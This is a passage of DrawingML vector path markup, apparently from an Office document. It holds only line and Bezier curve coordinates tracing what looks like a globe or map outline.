                  <a:pt x="16288" y="4375"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="16383" y="4407"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="16351" y="4316"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="16296" y="4233"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="16261" y="4143"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="16249" y="4102"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="16136" y="4072"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="16097" y="3988"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="16161" y="3936"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="16219" y="3831"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="16190" y="3735"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="16224" y="3638"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="16239" y="3582"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="16363" y="3491"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="16383" y="3425"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="16348" y="3318"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="16333" y="3255"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="16461" y="3255"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="16543" y="3198"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="16665" y="3213"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="16681" y="3163"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="16717" y="3139"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="16789" y="3160"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="16846" y="3101"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="16954" y="3121"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="16959" y="3042"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="17048" y="3079"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="17144" y="3075"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="17112" y="2952"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="17134" y="2915"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="17156" y="2806"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="17148" y="2796"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="17232" y="2804"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="17323" y="2826"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="17370" y="2858"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="17284" y="2858"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="17323" y="2959"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="17353" y="2978"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="17395" y="2976"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="17484" y="2991"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="17638" y="3042"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="17866" y="3160"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="17999" y="3249"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="18067" y="3266"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="18161" y="3314"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="18265" y="3387"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="18291" y="3373"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="18370" y="3414"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="18405" y="3397"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="18410" y="3378"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="18435" y="3397"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="18515" y="3415"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="18540" y="3394"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="18582" y="3420"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="18577" y="3409"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="18560" y="3387"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="20405" y="5317"/>
                  <a:pt x="21546" y="7925"/>
                  <a:pt x="21546" y="10800"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="21546" y="13961"/>
                  <a:pt x="20168" y="16799"/>
                  <a:pt x="17988" y="18765"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="17991" y="18759"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="17934" y="18791"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="17967" y="18740"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="18015" y="18686"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="18097" y="18612"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="18126" y="18573"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="18020" y="18649"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="17937" y="18710"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="17880" y="18775"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="17829" y="18816"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="17792" y="18833"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="17762" y="18855"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="17678" y="18917"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="17569" y="18993"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="17468" y="19077"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="17479" y="19078"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="17461" y="19105"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="17590" y="19016"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="17617" y="19014"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="17565" y="19083"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="17604" y="19062"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="17698" y="18981"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="17786" y="18924"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="17843" y="18890"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="17853" y="18888"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="17061" y="19579"/>
                  <a:pt x="16168" y="20158"/>
                  <a:pt x="15198" y="20595"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="15274" y="20551"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="15352" y="20509"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="15439" y="20455"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="15510" y="20413"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="15601" y="20354"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="15727" y="20285"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="15835" y="20211"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="15899" y="20159"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="15926" y="20127"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="16008" y="20058"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="16055" y="20018"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="16107" y="19959"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="16082" y="19934"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="16119" y="19886"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="16143" y="19849"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="16138" y="19811"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="16059" y="19802"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="16006" y="19802"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="15927" y="19801"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="15941" y="19730"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="15899" y="19757"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="15853" y="19748"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="15786" y="19790"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="15762" y="19726"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="15695" y="19710"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="15724" y="19683"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="15633" y="19686"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="15537" y="19686"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="15380" y="19703"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="15345" y="19663"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="15374" y="19610"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="15352" y="19548"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="15313" y="19551"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="15299" y="19513"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="15284" y="19444"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="15310" y="19395"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="15239" y="19383"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="15193" y="19360"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="15079" y="19430"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="15033" y="19371"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="15045" y="19334"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="15042" y="19280"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="14990" y="19247"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="14990" y="19206"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="14949" y="19206"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="14946" y="19144"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="14904" y="19105"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="14837" y="19164"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="14828" y="19195"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="14788" y="19262"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="14739" y="19329"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="14761" y="19354"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="14724" y="19385"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="14690" y="19467"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="14700" y="19518"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="14683" y="19550"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="14699" y="19588"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="14633" y="19679"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="14601" y="19735"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="14559" y="19785"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="14515" y="19843"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="14397" y="19902"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="14244" y="19913"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="14224" y="19891"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="14138" y="19890"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="14091" y="19902"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="13976" y="19876"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="13892" y="19865"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="13764" y="19863"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="13633" y="19838"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="13625" y="19814"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="13692" y="19755"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="13749" y="19696"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="13734" y="19661"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="13795" y="19644"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="13867" y="19590"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="13919" y="19526"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="13845" y="19493"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="13801" y="19521"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="13736" y="19525"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="13630" y="19575"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="13522" y="19565"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="13471" y="19583"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="13323" y="19585"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="13231" y="19558"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="13115" y="19551"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="13017" y="19580"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="13147" y="19595"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="13145" y="19646"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="12993" y="19688"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="12902" y="19689"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="12790" y="19740"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="12707" y="19807"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="12734" y="19829"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="12650" y="19865"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="12559" y="19952"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="12593" y="19999"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="12478" y="20004"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="12367" y="20016"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="12271" y="19969"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="12140" y="19937"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="12051" y="19959"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="11972" y="19977"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="11967" y="20003"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="11887" y="19998"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="11884" y="20024"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="11791" y="20046"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="11746" y="20087"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="11645" y="20137"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="11621" y="20208"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="11542" y="20191"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="11483" y="20238"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="11546" y="20277"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="11470" y="20297"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="11396" y="20225"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="11268" y="20304"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="11263" y="20351"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="11254" y="20385"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="11148" y="20430"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="11101" y="20474"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="11005" y="20511"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="10819" y="20534"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="10721" y="20533"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="10675" y="20540"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="10649" y="20556"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="10542" y="20563"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="10404" y="20588"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="10356" y="20577"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="10276" y="20580"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="10144" y="20602"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="10061" y="20630"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9921" y="20646"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9852" y="20691"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9834" y="20634"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9768" y="20681"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9792" y="20725"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9772" y="20757"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9740" y="20772"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9726" y="20809"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9766" y="20831"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9787" y="20853"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9876" y="20908"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9884" y="20940"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9830" y="20913"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9745" y="20888"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9810" y="20950"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9733" y="20918"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9760" y="20945"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9862" y="20999"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9889" y="21045"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9965" y="21071"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9972" y="21087"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="10043" y="21124"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="10041" y="21152"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="10071" y="21181"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="10164" y="21231"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="10186" y="21257"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="10172" y="21285"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="10181" y="21299"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="10155" y="21305"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="10080" y="21307"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="10081" y="21327"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="10165" y="21339"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="10334" y="21368"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="10438" y="21373"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="10549" y="21376"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="10623" y="21368"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="10699" y="21359"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="10744" y="21361"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="10837" y="21342"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="10945" y="21341"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="11056" y="21336"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="11194" y="21339"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="11292" y="21334"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="11425" y="21327"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="11485" y="21309"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="11519" y="21287"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="11657" y="21270"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="11830" y="21238"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="11980" y="21228"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="12163" y="21198"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="12374" y="21159"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="12658" y="21119"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="12798" y="21117"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="12907" y="21102"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="13091" y="21093"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="13057" y="21108"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="13128" y="21108"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="13204" y="21120"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="13184" y="21140"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="13288" y="21132"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="13369" y="21092"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="13473" y="21058"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="13621" y="20996"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="13609" y="21024"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="13537" y="21056"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="13495" y="21083"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="13401" y="21120"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="13537" y="21085"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="13631" y="21043"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="13643" y="21061"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="13579" y="21090"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="13714" y="21061"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="13769" y="21058"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="13783" y="21065"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="13781" y="21082"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="13847" y="21076"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="13968" y="21048"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="14044" y="21028"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="14113" y="21009"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="14200" y="20987"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="13130" y="21346"/>
                  <a:pt x="11989" y="21546"/>
                  <a:pt x="10800" y="21546"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="5772" y="21546"/>
                  <a:pt x="1550" y="18070"/>
                  <a:pt x="384" y="13397"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="372" y="13237"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="345" y="13113"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="333" y="13061"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="325" y="13015"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="318" y="12973"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="311" y="12936"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="284" y="12805"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="273" y="12724"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="264" y="12625"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="273" y="12635"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="269" y="12574"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="276" y="12564"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="274" y="12490"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="286" y="12529"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="291" y="12507"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="315" y="12546"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="322" y="12544"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="328" y="12505"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="372" y="12487"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="416" y="12507"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="492" y="12567"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="550" y="12586"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="630" y="12552"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="697" y="12509"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="776" y="12418"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="845" y="12318"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="904" y="12226"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="954" y="12110"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="980" y="12086"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="998" y="12012"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1023" y="11943"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1032" y="11903"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1007" y="11857"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="965" y="11847"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="927" y="11795"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="894" y="11759"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="874" y="11722"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="840" y="11657"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="813" y="11638"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="783" y="11586"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="724" y="11519"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="665" y="11398"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="611" y="11313"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="587" y="11251"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="582" y="11137"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="587" y="11056"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="581" y="10990"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="572" y="10899"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="606" y="10938"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="623" y="10886"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="625" y="10815"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="618" y="10711"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="619" y="10625"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="623" y="10480"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="630" y="10332"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="628" y="10034"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="636" y="9899"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="677" y="9745"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="724" y="9519"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="732" y="9401"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="737" y="9322"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="801" y="9120"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="865" y="8969"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="882" y="8972"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="941" y="8807"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="953" y="8758"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="995" y="8502"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1042" y="8416"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1059" y="8418"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1129" y="8172"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1172" y="8063"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1210" y="7952"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1333" y="7672"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1417" y="7481"/>
                </a:lnTo>
